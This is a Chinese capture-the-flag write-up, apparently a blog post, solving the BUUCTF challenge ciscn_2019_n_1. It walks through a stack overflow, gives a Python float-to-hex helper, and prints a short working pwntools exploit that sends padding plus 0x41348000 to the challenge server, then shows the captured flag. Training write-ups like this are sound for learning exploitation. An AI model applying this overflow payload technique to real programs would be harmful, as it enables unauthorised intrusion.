pwn学习(4)BUUCTF-ciscn_2019_n_1(浮点数转十六进制脚本积累)

checksec一下

IDA打开,如果满足的条件达成,就可以get flag

找到栈溢出漏洞,输入可以覆盖到v2

将代码11.28125在内存中的十六进制表示出来,

浮点数转十六进制代码如下:

复制代码
import struct

def float_to_hex(f):
    return hex(struct.unpack('<I',struct.pack('<f',f))[0])
print(float_to_hex(11.28125))
#output(0x41348000)

exp:

复制代码
from pwn import *

p=remote('node4.buuoj.cn',25860)

payload=b'a'*(0x30-0x4)+p32(0x41348000)
p.sendline(payload)

p.interactive()

运行出来的结果:

flag{8a5e8279-51a2-4b3b-8959-4d3f9b19227f}
总结:

脚本积累:浮点数转十六进制代码

相关推荐
有为少年2 分钟前
Welford 算法 | 优雅地计算海量数据的均值与方差
人工智能·深度学习·神经网络·学习·算法·机器学习·均值算法
shenghaide_jiahu25 分钟前
数学分析简明教程——总练习题6
学习
石像鬼₧魂石41 分钟前
HexStrike AI 理想操作流程清单(完整功能版)
linux·人工智能·windows·学习·ubuntu
wdfk_prog1 小时前
[Linux]学习笔记系列 -- [fs]file
linux·笔记·学习
其美杰布-富贵-李1 小时前
Java (Spring Boot) 反射完整学习笔记
java·spring boot·学习
andwhataboutit?1 小时前
LLAMAINDEX框架
学习
小许好楠1 小时前
java开发工程师-学习方式
java·开发语言·学习
小帅学编程2 小时前
JDBC学习
数据库·学习·oracle
其美杰布-富贵-李2 小时前
Python 反射完整学习笔记
笔记·python·学习·反射
charlie1145141912 小时前
快速在WSL上开发一般的C++上位机程序
开发语言·c++·笔记·学习·环境配置·工程